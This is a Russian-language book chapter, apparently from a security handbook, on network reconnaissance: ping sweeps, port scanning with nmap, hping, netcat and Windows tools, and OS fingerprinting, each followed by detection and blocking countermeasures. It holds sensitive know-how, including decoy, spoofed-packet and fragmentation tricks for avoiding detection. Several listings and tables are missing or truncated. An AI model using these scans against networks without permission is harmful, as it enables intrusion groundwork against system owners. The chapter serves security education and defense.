В тех случаях, когда обмен данными по протоколу ICMP заблокирован, в первую очередь применяется метод сканирования портов (port scanning), который более подробно рассматривается ниже в этой главе. Просканировав стандартные порты каждого потенциального IP-адреса сети, можно определить, какие узлы подключены к сети. Если порт открыт (opened mode) или находится в режиме ожидания (listening mode), значит, по данному адресу находится подключенный к Internet узел сети. Недостатками этого метода являются большие временные затраты и некоторая неопределенность результата (если по какому-то адресу не удалось обнаружить ни одного порта, то это еще не означает, что соответствующий узел не подключен к Internet). Одной из утилит, которые можно использовать для сканирования портов, является nmap. Как уже упоминалось, с помощью этой утилиты можно проводить ICMP-прослушивание, однако этим перечень ее возможностей далеко не исчерпывается. В частности, эта утилита позволяет выполнять так называемое TCP-прослушивание сканированием (TCP ping scan). Данный режим включается с помощью параметра -рт и указания номера порта, например 80. Выбор порта с номером 80 обусловлен тем, что в подавляющем большинстве случаев именно он используется узлами сети для обмена данными через пограничные маршрутизаторы или брандмауэры с компьютерами, расположенными в так называемой демилитаризованной зоне (DMZ — demilitarized zone). При использовании указанного параметра утилита рассылает узлам исследуемой сети пакеты АСК, а затем ожидает поступления пакетов RST, что свидетельствует о том, что узел подключен к Internet. [tsunami] nmap -sP -PT80 192.168.1.0/24 Как видно из приведенного выше листинга, этот метод определения подключенных к Internet узлов очень эффективен, даже если на них блокируется передача пакетов ICMP. С помощью утилиты nmap имеет смысл провести несколько подобных проверок, тестируя такие стандартные порты как SMTP (25), POP (110), AUTH (110), IMАР (143) или другие порты, которые, по вашим сведениям, могут быть уникальными на каком-либо компьютере исследуемой сети. [tsunami] hping 192.168.1.2 -S -p 80 -f В некоторых случаях простые устройства управления доступом не могут корректно обрабатывать фрагментированные пакеты, что позволяет им проходить через такие устройства и достигать интересующего взломщика адреса. Обратите внимание, что в случае, когда порт открыт, возвращаются флаги TCP SYN (s) и дек (А). Утилиту hping очень легко использовать в сценариях оболочки с параметром счетчика пакетов -cN, где N — это количество пакетов, которые нужно отправить в Internet, прежде чем переходить к выполнению следующей команды сценария. Хотя данный метод и не обладает такой скоростью, как описанные выше методы ICMP-прослушивания, в некоторых случаях только он может помочь выяснить конфигурацию сети. Более подробно утилита hping рассматривается в главе 11, "Брандмауэры". [shadow] icmpenum -i2 -с 192.168.1.0 В приведенном примере сеть класса С (192.168.1.0) была протестирована с использованием ICMP-запроса TIME STAMP REQUEST. Однако реальная мощь утилиты icmpenum заключается в возможности идентификации узлов с помощью ложных пакетов, что позволяет избежать обнаружения злоумышленника. Это возможно благодаря тому, что утилита icmpenum позволяет генерировать ложные пакеты с использованием параметра -s и пассивно ожидать отклика при указании параметра -р. |
Контрмеры: защита от прослушивания сети Поскольку прослушивание сети в лучшем случае может вызывать раздражение, то очень важно выявлять все попытки таких действий. В зависимости от принятой в организации политики обеспечения безопасности можно также заблокировать прохождение пакетов, передаваемых при ping-прослушивании. В этом разделе рассматриваются обе возможности. Выявление факта прослушивания Как уже говорилось, ICMP- и TCP-прослушивание является общепринятым методом исследования сети перед непосредственной попыткой проникновения в сеть. Поэтому выявление факта прослушивания очень важно с точки зрения возможности получения информации о потенциальном месте проникновения и источнике угрозы. Один из основных методов выявления прослушивания состоит в использовании сетевой программы выявления вторжений, такой как Network Flight Recorder (NFR), или программы, установленной на исследуемом взломщиком узле. Ниже приведен алгоритм, который можно реализовать в программе, предназначенной для выявления факта прослушивания. # Обнаружение прослушивания с помощью ICMP/Ping Что касается защиты на уровне отдельного узла, для этого можно с успехом применять утилиты UNIX, которые позволяют выявлять и регистрировать попытки прослушивания. Если, просматривая файл журнала, созданный такой утилитой, вы обнаружите массированные ICMP-запросы ECHO, исходящие из одной и той же сети или от одного и того же узла, это, скорее всего, означает, что вашу сеть кто-то исследует. На такие факты необходимо обращать самое пристальное внимание, так как после изучения сети обычно предпринимается реальная попытка проникновения. Таблица 2.1.Некоторые утилиты UNIX, предназначенные для зашиты от прослушивания на уровне узла
Предотвращение прослушивания Если обнаружение факта прослушивания имеет столь большое значение, то что тогда говорить о предупреждении таких попыток! Мы рекомендуем очень внимательно оценить, насколько важен для вашей организации обмен данными по протоколу ICMP между узлами вашей сети и Internet. Имеется много разнообразных типов сообщений ICMP, ECHO и ECHO_REPLY — лишь два из них. В большинстве случаев нет никакой необходимости разрешать обмен данными между узлами сети и Internet с использованием всех имеющихся типов сообщений. Практически все современные брандмауэры обладают возможностью отфильтровывать пакеты ICMP, поэтому единственная причина, по которой они могут проходить во внутреннюю сеть,— та или иная производственная необходимость. Даже если вы твердо убеждены в том, что нельзя полностью заблокировать протокол ICMP, обязательно заблокируйте те типы сообщений, которые вам не нужны для работы. Как правило, вполне достаточно, чтобы с зоной DMZ можно было взаимодействовать посредством сообщений ECHO_REPLY, HOST UNREACHABLE И TIME EXCEEDED. Кроме того, с помощью списка управления доступом (ACL — Access Control List) можно разрешить обмен сообщениями по протоколу ICMP только с несколькими IP-адресами, например, принадлежащими вашему провайдеру Internet. Это позволит провайдеру, при необходимости, проверить качество связи, но при этом проникновение посторонних извне в компьютеры, подключенные к Internet, будет значительно затруднено. Необходимо всегда помнить, что несмотря на удобство и мощь протокола ICMP с точки зрения диагностирования сетевых проблем, он с успехом может использоваться и для создания таких проблем. Разрешив неограниченный доступ по протоколу ICMP во внутреннюю сеть, вы тем самым предоставляете взломщикам возможность реализовать нападение типа DoS (например с помощью Smurf-метода). Более того, если взломщику удастся проникнуть в один из ваших компьютеров, он может через "потайной ход" в операционной системе с помощью таких программ, как loki, организовать скрытое тунеллирование данных, передаваемых по протоколу ICMP. Более подробная информация о loki приведена в журнале Phrack Magazine, том 7, выпуск 51 за 1 сентября 1997 года, статья 06(http://phrack.infonexus.com/search.phtml?view&article=p51-6). Запросы IСМР Если говорить о возможностях протокола ICMP для сбора информации о сети, то прослушивание с помощью утилиты ping (или, другими словами, с помощью пакетов ECHO, пересылаемых по протоколу ICMP), — это только верхушка айсберга. Просто обмениваясь пакетами ICMP с интересующей вас системой, о ней можно получить любую информацию. Например, с помощью таких утилит UNIX, как icmpquery (http://packetstorm.securify.com/UNIX/scanners/icmpquery.с) или icmpush (http://packetstorm.security.com/UNIX/scanners/icmpush22.tgz), можно узнать системное время удаленного узла (т.е. часовой пояс, в котором он находится). Для этого нужно отправить по протоколу ICMP сообщение типа 13 (TIMESTAMP). Точно так же, обратившись к определенному устройству с ICMP-запросом типа 17 (ADDRESS MASK REQUEST), можно узнать маску подсети. Знание маски подсети сетевой карты позволяет определить все существующие подсети. Например, используя маску подсети, усилия можно сосредоточить на определенной подсети и избежать необходимости обращения к адресам рассылки широковещательных сообщений. Утилита icmpquery позволяет запрашивать как системное время, так и маску подсети. icmpquery <query> [-B] [-f fromhost] [-d delay] [-T time] targets Например, чтобы с помощью icmpquery узнать системное время маршрутизатора, воспользуйтесь следующей командой. [tsunami] icmpquery -t 192.168.1.1 Запрос на получение маски подсети выглядит следующим образом. [tsunami] icmpquery -m 192.168.1.1 Далеко не все маршрутизаторы/узлы отвечают на ICMP-запросы TIMESTAMP или NETMASK. Поэтому с помощью утилит icmpquery и icmpush на различных узлах можно получить разные результаты.
Контрмеры: защита от ЮМР-запросов Одним из самых лучших методов защиты является блокирование IOМР-запросов тех типов, которые способствуют разглашению информации о сети за ее пределами. Как минимум, на пограничном маршрутизаторе необходимо заблокировать прохождение во внутреннюю сеть пакетов TIMESTAMP (ICMP-сообщение тип 13) и ADDRESS MASK (тип 17). Например, если в качестве пограничного маршрутизатора используется маршрутизатор Cisco, запретите ему отвечать на указанные запросы, добавив следующие строки в список управления доступом. access-list 101 Для выявления рассмотренных выше видов деятельности можно также воспользоваться сетевыми системами выявления вторжений V(NIDS), например, программой Марти Рош (Marty Roach) (http://www.snort.org/). При выявлении такого типа вторжений будет выведена следующая информация. [**] PING-ICMP Timestamp [**]
Сканирование портов С помощью ICMP- или TCP-прослушивания мы установили, какие компьютеры исследуемой сети подключены к Internet. Кроме того, вся требуемая информация собрана также и с использованием запросов ICMP. Теперь можно перейти к этапу сканирования портов этих компьютеров. Сканирование портов (port scanning) — это процесс пробного подключения к портам TCP и UDP исследуемого компьютера с целью определения, какие службы на нем запущены и обслуживаются ли ими соответствующие порты. Обслуживаемые порты могут находиться в работающем состоянии или в состоянии ожидания запроса (listening mode). Определение портов, находящихся в состоянии ожидания запроса, — этап, имеющий определяющее значение для последующего выяснения типа используемой операционной системы, а также работающих на компьютере прикладных программ. Активные службы, находящиеся в состоянии ожидания, могут предоставить взломщику возможность получить несанкционированный доступ. Это обычно происходит в том случае, когда система безопасности компьютера не настроена должным образом или в программном обеспечении имеются хорошо известные изъяны в системе защиты. За последние несколько лет средства и методы сканирования портов были значительно усовершенствованы. Учитывая ограниченный объем книги, мы рассмотрим лишь самые популярные из них, с помощью которых можно получить значительную часть важной информации. Теперь мы уже не будем пытаться определить, подключен ли тот или иной компьютер к Internet, как это делалось ранее. Для упрощения задачи будем считать, что мы это уже установили однозначно и сосредоточимся лишь на методике выявления портов, находящихся в состоянии ожидания, или возможных точек проникновения в исследуемую систему.
|
Типы сканирования Прежде чем перейти к описанию конкретных средств, используемых для сканирования портов, необходимо уделить немного времени обзору методов сканирования, известных в настоящее время. Одним из пионеров реализации различных методов сканирования является ранее упоминавшийся Федор (Fyodor). Многочисленные приемы сканирования были реализованы им в утилите nmар. Многие из описанных в данной книге методов сканирования были предложены самим Федором.
А UDP-сканирование (UDP scan). Данный метод заключается в отправке на исследуемый узел пакетов по протоколу UDP. Если в ответ поступает сообщение о том, что порт ICMP недоступен (ICMP port unreachabie), это означает, что соответствующий порт закрыт. С другой стороны, если такого сообщения нет, можно предположить, что данный порт открыт. В связи с тем, что протокол UDP не гарантирует доставки, точность данного метода очень сильно зависит от множества факторов, влияющих на использование системных и сетевых ресурсов. Кроме того, UDP-сканирование — очень медленный процесс, что особенно сказывается при попытках сканирования устройств, в которых реализован мощный алгоритм фильтрации пакетов. Поэтому, планируя использовать UDP-сканирование, приготовьтесь к тому, что результаты могут оказаться ненадежными. |
Идентификация запущенных TCP- и UDP-служб Использование хорошей утилиты сканирования портов — важнейший этап сбора информации об исследуемой сети. Хотя для этих целей существует много различных программ, ориентированных как на платформу UNIX, так и на платформу Windows NT, мы ограничимся рассмотрением лишь самых популярных и проверенных временем сканеров. strobe Утилита strobe — это общепризнанный и популярный TCP-сканер портов, написанный Джулианом Ассанжем (Julian Assange) (ftp://ftp.FreeBSD.org/pub/ FreeBSD/ports/distfiles/strobe-l.06.tgz). Она стала известной уже довольно давно и, вне всякого сомнения, считается одной из самых быстрых и надежных утилит этого класса. К основным возможностям утилиты strobe относится оптимизация системных и сетевых ресурсов, а также сканирование исследуемой системы с максимальной эффективностью. Помимо высокой эффективности, утилита strobe версии 1.04 и выше может собирать идентификационные маркеры (если, конечно, они имеются), связанные с каждым проверяемым портом. Эта информация может оказаться полезной при определении операционной системы, а также запущенных на компьютере службах. Подробнее процесс сбора маркеров (banner grabbing) будет рассматриваться в главе 3. [tsunami] strobe 192.168.1.10 Хотя в большинстве случаев утилита strobe предоставляет точные данные, все же важно помнить о некоторых ее ограничениях. Во-первых, данная утилита выполняет TCP-сканирование, не поддерживая сканирование по протоколу UDP. Поэтому в некоторых случаях можно получить лишь половину требуемой информации. Во-вторых, при соединении с каждым портом утилита strobe выполняет лишь TCP-сканирование подключением. Хотя именно этим и объясняется высокая надежность получаемых результатов, в то же время использование утилиты strobe очень легко выявить на исследуемой системе. Поэтому необходимо рассмотреть и другие утилиты сканирования, лишенные указанных недостатков. udp_scan Для UDP-сканирования, которого не выполняет strobe, можно воспользоваться утилитой udp_scan, которая изначально входила в пакет SATAN (Security Administrator Tool for Analyzing Networks), написанный Дэном Фармером (Dan Farmer) и Вайетсом Венема (Wietse Venema) в 1995 году. Хотя сам пакет SATAN несколько устарел, входящие в его состав утилиты по-прежнему можно использовать. Кроме того, по адресу http://wwdsilx.wwdsi.com можно получить новую версию пакета SATAN, которая теперь называется SAINT. Несмотря на наличие множества других утилит UDP-сканирования, мы пришли к выводу, что udp_scan — одна из самых надежных утилит, позволяющая получать достоверные результаты. Правда, необходимо сказать также о том, что, несмотря на высокую надежность утилиты udp_scan, у нее имеется и один существенный недостаток. Эта утилита не может противостоять контратаке какого-либо из пакетов IDS, который осведомлен о методах, используемых в пакете SATAN для сканирования портов. Таким образом, если сканирование необходимо выполнить более скрытно, поишите какое-нибудь другое средство. Обычно с помощью утилиты udp_scan проверяются порты с номерами, меньшими 1024, а также некоторые определенные порты с большими номерами. ;tsunami] udp_scan 192.168.1.1 1-1024 netcat Еще одной прекрасной утилитой является netcat (или nc), написанная Хоббитом (Hobbit, hobbit@avian.org). Эта утилита может выполнять так много различных задач, что была названа нами "швейцарским армейским ножом". Помимо остальных возможностей, о которых мы еще не раз будем говорить на протяжении всей книги, утилита nc позволяет применять основные методы TCP- и UDP-сканирования. Степенью детализации выводимых данных можно управлять с помощью параметров -v и -vv, которые включают, соответственно, режимы подробного и очень подробного отображения результатов. Параметр -z применяется для включения режима нулевого ввода-вывода (zero mode I/O), используемого для сканировании портов, а параметр -..2 позволяет задать для каждого соединения интервал ожидания. По умолчанию утилита пс выполняет TCP-сканирование, а для UDP-сканирования необходимо использовать параметр -и (как показано во втором примере). tsunami] nc -v -z -w2 192.168.1.1 1-140 nmap Рассмотрев простейшие средства сканирования портов, давайте перейдем к обсуждению возможностей безусловного лидера этой категории — утилиты nmap. Данная утилита, разработанная Федором (Fyodor) (http://www.insecure.org/nmap), обладает не только базовыми возможностями TCP- и UDP-сканирования, но и поддерживает все остальные упоминавшиеся выше методы. Очень редко можно найти утилиту, которая предоставляла бы столь богатый набор возможностей в одном пакете. Итак, запустим утилиту и посмотрим, какие возможности она предоставляет. [tsunami]# nmap -h Помимо вышеуказанных, утилита nmap предоставляет и другие полезные возможности, заслуживающие детального обсуждения. Так, в приведенном выше примере мы ис-ПОЛЬЗОЕИЛИ параметры командной строки, при которых осуществлялось сканирование одного узла. Однако утилита nmap с такой же легкостью позволяет сканировать и всю сеть. Как легко заметить, nmap поддерживает описания диапазонов адресов в нотации CIDR (Classless Inter-Domain Routing — бесклассовая маршрутизация доменов Internet), описанной в RFC 1519 (http://www.ietf.org/rfc/rfcl519.txt). В этом формате очень легко задавать диапазоны адресов вида 192.168.1.1-192.168.1.254. Полученную информацию можно сохранить в обычном текстовом файле с помощью параметра -о. При указании параметра -oN результаты будут сохранены в удобочитаемом формате. [tsunami] nmap -sS 192.168.1.1 -D 10.1.1.1 В приведенном примере параметры, введенные в командной строке утилиты nmap, обеспечивают сканирование в режиме, затрудняющем обнаружение реального адреса сканирующего узла. [tsunami] nmap -I 192.168.1.10 В приведенном выше фрагменте показано, как идентифицируются владельцы всех обнаруженных процессов. Опытный читатель должен обратить внимание на то, что Web-сервер принадлежит не пользователю nobody, как это должно быть в соответствии с элементарными правилами обеспечения безопасности, а пользователю root, что является вопиющим нарушением. Выполнив идентификацию процессов и установив такой интересный факт, можно заключить, что взломщик, которому удастся проникнуть через систему защиты Web-сервера, получит полный контроль над данным компьютером. |
Утилиты сканирования портов для системы Windows В предыдущих разделах были рассмотрены утилиты сканирования портов с точки зрения пользователя UNIX, однако неужели не существует аналогичных средств, доступных для пользователей Windows? Конечно же, это не так. Следующие утилиты сканирования портов являются лучшими среди подобных средств, поскольку обладают высокой скоростью, точностью и широким набором функциональных возможностей. NetScanTools Pro 2000 Одним из наиболее универсальных средств исследования сетей, доступных в настоящее время, является пакет NetScanTools Pro 2000 (NSTP2K), содержащий самые разнообразные утилиты, объединенные общим интерфейсом. С использованием NSTP2K можно генерировать запросы DNS, включая nslookup, dig и axf r, запросы whois, осуществлять ping-прослушивание, сканировать таблицы имен NetBIOS, отслеживать сообщения SNMP и выполнять многие другие задачи. Более того, с использованием пакета NetScanTools Pro 2000 можно выполнять несколько задач одновременно. Например, можно выполнять сканирование портов одной сети и осуществлять ping-прослушивание другой сети (хотя мы не можем ручаться за правильность таких действий по отношению к большим сетям). SuperScan Утилита SuperScan, написанная Робином Кейром (Robin Keir) (http: //members. home.com/rkeir/software.html), является еще одной быстрой и гибкой утилитой TCP-сканирования портов и имеет гораздо более привлекательную стоимость — она распространяется бесплатно! Как и пакет NSTP2K, утилита SuperScan позволяет гибко задавать перечень IP-адресов исследуемых узлов и сканируемых портов. Особенно удобно использовать режим Extract from file (рис. 2.4). Лучше всего особенности его применения описаны в справочной системе. Вот небольшой фрагмент из справочной системы утилиты SuperScan, из которого видно, что она позволяет сэкономить значительную часть времени.
"Режим [The "Extract from file" feature scans] позволяет просматривать содержимое любого текстового файла и извлекать из него корректные IP-адреса и имена узлов. При поиске корректных имен программой выполняются достаточно интеллектуальные действия. Однако перед обработкой файла из него нужно удалить потенциально неоднозначные фрагменты текста, воспользовавшись внешним текстовым редактором. На кнопках Browse и Extract можно щелкать столько раз, сколько различных файлов имеется в вашем распоряжении. При этом в список имен исследуемых узлов программой будут добавлены все новые имена. Все повторяющиеся элементы будут автоматически удалены. После нахождения всех имен узлов щелкните на кнопке Resolve, чтобы преобразовать их в числовые IP-адреса и выполнить подготовку к этапу сканирования портов." NTOScanner Утилита NTOScanner компании NTObjectives, Inc. (http://www.ntobjectives.com) представляет собой быструю программу TCP-сканирования с графическим интерфейсом, которая при ручной установке соответствующего режима позволяет также собирать маркеры портов, находящихся в состоянии ожидания запросов. Однако эта утилита имеет некоторые неудобства при задании исследуемых узлов и портов, а также требует, чтобы перед сканированием сетей класса С к узлам было применено ping-прослушивание. Утилита NTOScanner чрезвычайно полезна для определения служб, запущенных на конкретном узле или в сети, достижимой с помощью ICMP-пакетов. На рис. 2.5 показана утилита NTOScanner в процессе получения маркеров с удаленного зашумленного узла. WinScan Утилита WinScan компании Scan Mathias of Prosolve (http://www.prosolve.com) является свободно распространяемой программой TCP-сканирования портов, реализованной в двух версиях: с графическим интерфейсом (winscan.exe) и для использования в командной строке (scan.exe). Мы регулярно обращаемся к версии для командной строки в файлах сценариев, поскольку при сканировании сетей класса С она позволяет получить удобные для анализа результаты. При использовании утилит Win32 strings, tee и tr компании Mortice Kern Systems, Inc. (http://www.mks.com) следующая консольная команда NT будет выполнять сканирование сети для портов из диапазона 0-1023 и формировать результат в виде строк с полями, разделенными двоеточиями, в формате IP-адрес:имя_службы: порт/протокол (для облегчения восприятия строка была разделена на две части). scan.exe -n 192.168.7.0 -s 0 -е 1023 -f|strings|findstr/с:"/top"| Параметр -f при медленных соединениях лучше не использовать, поскольку полученные результаты могут оказаться не очень надежными. При запуске приведенной выше команды будут получены примерно следующие данные. 192.168.22.5:nbsession:139/tcp Большое спасибо Патрику Хейму (Patrick Heim) и Ясону Глассбергу (Jason Glassberg) за предоставление этой интересной команды.
С:\Toolbox>ipeye.exe
WUPS Утилита Windows UDP Port Scanner (WUPS) разработана теми же авторами (http://ntsecurity.nu). Эта утилита представляет собой надежное, с графическим интерфейсом и относительно быстрое средство сканирования UDP-портов, несмотря на то, что позволяет одновременно сканировать заданную последовательность портов лишь одного узла. Как видно из рис. 2.6, утилита WUPS является надежным средством для быстрого UDP-сканирования каждого требуемого узла и, следовательно, значительно облегчает выполнение этой утомительной задачи.
|
Защита от сканирования портов В табл. 2.2 приведен перечень различных популярных утилит сканирования, а также типы сканирования, которые эти утилиты позволяют выполнять. Контрмеры: защита от сканирования портов Выявление факта сканирования Таблица 2.2. Популярные утилиты сканирования портов и их возможности
Метод UDP-сканирования утилиты netcat не работает в операционной системе Windows NT, поэтому пользователям этой ОС не стоит доверять полученным результатам. # Алгоритм выявления факта сканирования Для выявления попыток сканирования портов можно также воспользоваться утилитой snort (www.snort.org) (см. также http://spyjurenet.com/linuxrc.org/projects/ snort/). Как вы могли догадаться, эта утилита является одной из предпочитаемых нами программ IDS (заметим, что ее версии 1.x не позволяют обнаруживать фрагментацию пакетов). Вот пример листинга, содержащего данные о попытке сканирования портов. [**] spp_portscan: PORTSCAN DETECTED from 192.168.1.10 [**] Для платформы UNIX существует немало утилит, таких, например, как Утилита: scanlogd (http://www.openwall.com/scanlogd/) компании Solar Designer, которые выявляют и регистрируют попытки сканирования. Кроме того, утилиту Psionic PortSentry, созданную в рамках проекта Abacus (http://www.psionic.com/abacus), можно настроить не только на регистрацию, но и на принятие контрмер при выявлении факта активного сканирования. Один из способов борьбы с попытками сканирования портов заключается в автоматической установке для ядра правил фильтрации, когда к уже существующим добавляется новое правило, запрещающее доступ со стороны узла-нарушителя. Такое правило можно задать в конфигурационном файле утилиты PortSentry. При этом одно и то же правило может отличаться в различных системах. Для системы Linux 2.2.x, в которой имеется поддержка ядра брандмауэра, в файл portsentry.conf нужно добавить запись, аналогичную следующей. # New ipchain support for Linux kernel version 2.102+ Утилита PortSentry совместима с большинством версий UNIX, включая Solaris. Независимо от того, применяете ли вы какие-либо утилиты или нет, необходимо помнить, что массированные попытки сканирования портов, инициируемые каким-либо узлом или какой-нибудь сетью, могут означать, что кто-то изучает вашу сеть. Всегда обращайте самое пристальное внимание на такие действия, поскольку за ними может последовать полномасштабное вторжение. И наконец, не забывайте о том, что имеется возможность активного противостояния или блокирования попыток сканирования портов. Все эти вопросы рассматриваются в статье, опубликованной компанией Solar Designer (http://www. openwall.com/scanlogd/P53-13.gz). В этой статье содержатся дополнительные советы по разработке и использованию систем выявления попыток сканирования. Еще одним детектором сканирования для системы Windows, заслуживающем отдельного упоминания, является программа BlackICE (рис. 2.7) компании Network ICE (http://www.-networkice.com). Данная программа представляет первое основанное на использовании агентов средство выявления вторжений, которое можно использовать как в Windows 9х, так и в NT. В момент написания данной книги этот программный продукт был коммерческим, хотя в ближайшем будущем компания обещает подготовить свободно распространяемую версию. И наконец, программа ZoneAlarm (http://www.zonelabs.com/zonealarm.htm) хорошо подходит для платформы Windows и может применяться в качестве средства IDS на уровне брандмауэра.
Предотвращение сканирования Вряд ли можно помешать кому-либо предпринять попытку сканирования портов на вашем компьютере, однако вполне реально свести к минимуму связанный с этим риск. Для этого нужно заблокировать все службы, в работе которых нет необходимости. В среде UNIX данная задача решается с помощью добавления символов комментария в соответствующие строки файла /etc/inetd. corif, а также отключения автоматического запуска ненужных служб в сценарии начальной загрузки. Более подробно эти вопросы освещены в главе 8, "Хакинг UNIX". Активное определение операционной системы Итак, мы убедились, что существует множество различных приемов и средств сканирования портов. Вспомните, что при сканировании портов преследуется две основные цели. Во-первых, нужно установить, какие TCP- и UDP-порты на исследуемом компьютере находятся в состоянии ожидания запросов. Во-вторых, необходимо определить тип операционной системы, используемой на удаленном узле. Информация об операционной системе понадобится на последующих этапах, при составлении схемы уязвимых участков. Об этом речь пойдет в последующих главах. Важно помнить, что при этом необходимо быть особенно точным и внимательным к мелочам. Именно поэтому очень важно абсолютно правильно установить тип удаленной операционной системы. При определении типа ОС очень полезной оказывается косвенная информация, получаемая, например с помощью сбора маркеров, о которых мы поговорим в главе 3. При этом будет собрана информация о таких службах, как FTP, telnet, SMTP, HTTP, POP и других. Сбор маркеров — это один из самых простых методов определения типа операционной системы, а также версий работающих под ее управлением служб. Нетрудно догадаться, что существуют различные средства, призванные помочь в решении этой задачи. Среди доступных можно отметить две утилиты, позволяющие получить самые точные результаты, — уже хорошо нам известная nmар и утилита queso. Точность результатов, выдаваемых обеими утилитами, объясняется, прежде всего, тем, что обе они предоставляют возможность исследования стека протоколов TCP/IP (stack fingerprinting). |
Активное исследование стека Прежде чем перейти к рассмотрению возможностей утилит nmap и queso, необходимо вкратце пояснить, в чем же состоит суть исследования стека TCP/IP. Исследование стека (stack fingerprinting) — это очень мощная технология, позволяющая быстро определить тип и версию операционной системы узла с высокой степенью вероятности. Очевидно, что разные разработчики по-разному подходят к реализации стека TCP/IP. В частности, многие разработчики по-своему трактуют рекомендации документов RFC, что впоследствии проявляется в логике работы тех или иных сетевых служб. Таким образом, зная о существующих различиях и проверив реакцию служб изучаемой системы на различные ситуации, можно практически однозначно определить тип и версию соответствующей операционной системы. Для достижения максимальной достоверности при исследовании стека требуется по крайней мере один порт, находящийся в режиме ожидания запросов. С помощью утилиты nmap можно выдвинуть предположение об используемой операционной системе даже при отсутствии таких портов, однако степень его достоверности в этом случае будет невысокой. Полное описание процесса исследования стека можно найти в статье Федора (Fyodor), впервые публикованной в журнале Phrack Magazine.
Для того чтобы воспользоваться утилитой nmap и выполнить все перечисленные тесты (за исключением обработки фрагментации и обработки сообщений об ошибках ICMP), достаточно указать в командной строке параметр -о. Давайте посмотрим, как будет выглядеть полученный результат. [tsunami] nmap -0192.168.1.10 Как видно, при включении режима исследования стека утилиты nmap можно легко получить достаточно точное определение типа и версии операционной системы. Даже если на изучаемом узле не открыто ни одного порта, утилита nmap поможет сделать довольно точное предположение об используемой операционной системе. [ tsunami]# nmap -p80 -0 10.10.10.10 Как видно из приведенного листинга, утилита nmap даже без открытых портов, правильно определила операционную систему Linux. [tsunami] queso 10.10.10.20:25
Контрмеры: защита от определения операционной системы Обнаружение попыток определения операционной системы Многие из упоминавшихся выше средств выявления сканирования с успехом могут служить и для обнаружения попыток определения типа операционной системы, Хотя они не проинформируют вас о том, что выполнялось специальное сканирование с помощью утилиты nmap или queso, с их помощью все же удастся распознать сам факт такого особого сканирования, например с установкой флага SYN. Предупреждение попыток определения операционной системы Хотелось бы посоветовать какое-нибудь средство, позволяющее противодействовать попыткам определения операционной системы, однако, к сожалению, вынуждены констатировать, что решить эту проблему весьма непросто. Конечно, можно изменить исходный код операционной системы (естественно, если он имеется в вашем распоряжении) или поменять ее параметры, влияющие на характеристики стека, однако такое вмешательство может значительно изменить функциональность ОС. Например, в системе FreeBSD 4.x имеется параметр ядра TCP_DROP_SYNFIN, который можно применить для игнорирования пакетов SYN+FIN, используемых утилитой nmap в целях исследования стека. Установка этого параметра поможет пресечь попытки определения типа операционной системы, однако в то же время нарушит поддержку RFC 1644 (TCP Extensions for Transactions). Пассивное определение операционной системы Из предыдущих разделов видно, насколько эффективными оказываются средства активного исследования стека, такие как утилиты nmap и queso. Важно не забывать о том, что рассмотренные выше приемы являются активными по своей природе. При этом для определения специфических особенностей сетевого стека и используемой операционной системы каждому узлу нужно передавать тестовые пакеты. Поскольку все активные методы предполагают передачу пакетов, системам выявления вторжений относительно просто выявить все предпринимаемые попытки идентификации операционной системы. Другими словами, активное исследование является далеко не самым скрытым методом, к которому может прибегнуть взломщик. |
Пассивное исследование стека Основные принципы пассивного исследования стека аналогичны концепциям, лежащим в основе его активного исследования. Однако в данном случае вместо передачи пакетов для определения используемой операционной системы взломщик осуществляет мониторинг сетевого трафика. Таким образом, наблюдая за сетевым трафиком между различными компьютерами, можно определить тип и версию удаленной операционной системы. Большие исследования в этой области были проведены Ланцом Спитзнером (Lance Spitzner). На их основе была написана книга, которую можно найти по адресу http://www.enteract.com/~lspitz/finger.html. Кроме ТОГО, по адресу http://www.subterrain.net/projects/siphon можно также найти утилиту siphon, предназначенную для пассивного исследования портов и идентификации операционной системы. Теперь познакомимся с тем, как же выполняется пассивное исследование стека. Параметры, используемые для пассивного исследования стека Для определения типа и версии операционной системы можно использовать самые разнообразные признаки. Однако сейчас мы ограничимся рассмотрением лишь нескольких атрибутов, связанных с сеансом сетевого взаимодействия с помощью протокола TCP/IP.
Проанализировав каждый из атрибутов и сравнив полученные результаты со значениями из имеющейся базы данных, можно определить удаленную операционную систему. Поскольку этот метод не гарантирует получения правильного ответа на основе каждого из атрибутов в отдельности, для получения более надежных результатов атрибуты можно комбинировать. Именно такой подход и используется утилитой siphon. 06/04-11:23:48.297976 192.168.1.11:23 -> 192.168.1.10:2295 При этом видно, что упоминавшиеся выше атрибуты принимают следующие значения:
Теперь обратимся к базе данных утилиты siphon — файлу osprints.conf: [shadow]f grep -i Solaris osprints.conf Из приведенного фрагмента видно, что в четвертой записи содержатся те же значения, которые были получены с использованием утилиты snort. Таким образом, с помощью утилиты siphon можно точно определить исследуемую операционную систему. [crush]# siphon -v -i xl0 -о fingerprint.out Итак, в качестве удаленной была определена система Solaris 2.6. И это .не вызвало особых проблем. Solaris: ndd -set /dev/ip ip_def_ttl 'число'
Контрмеры: защита от пассивного определения операционной системы Для защиты от пассивного определения операционной системы можно использовать приемы, описанные в разделе "Контрмеры: Защита От Определения Операционной Системы". |
Средства автоматического сбора информации Помимо описанных в данной главе, существует огромное количество других средств, и каждый день этот список увеличивается. Поскольку в рамках одной книги описать все эти средства невозможно, вкратце остановимся лишь на двух из них. Рис. 2.8. Пакет cheops с графическим интерфейсом объединяет многие популярные утилиты исследования сетей Вторая утилита, на которой мы остановимся, называется tkined и входит в состав пакета Scotty (http://wwwhome.cs.utwente.nl/~schoenw/scotty/). По существу, эта утилита является редактором сетевого редактирования, написанным на языке Tel, который, объединяет различные средства управления сетью, обеспечивающие сбор всевозможной информации об архитектуре и работе сети. Утилита tkined обладает большой гибкостью и позволяет проводить исследование сети с представлением результатов в графической форме. Хотя с ее помощью нельзя определить тип операционной системы, она обеспечивает выполнение большинства операций, описанных как в данной главе, так и главе 1. Кроме утилиты tkined, в состав пакета Scotty входит немало других интересных средств, заслуживающих самого пристального внимания. Контрмеры: защита от средств автоматического сбора информации
Поскольку в автоматизированных средствах, подобных Scotty, tkined и cheops, объединены приемы, о которых рассказывалось выше в данной главе, для защиты от них можно применять контрмеры, аналогичные тем, которые применяются для соответствующих средств сбора информации, сканирования и т.д. |
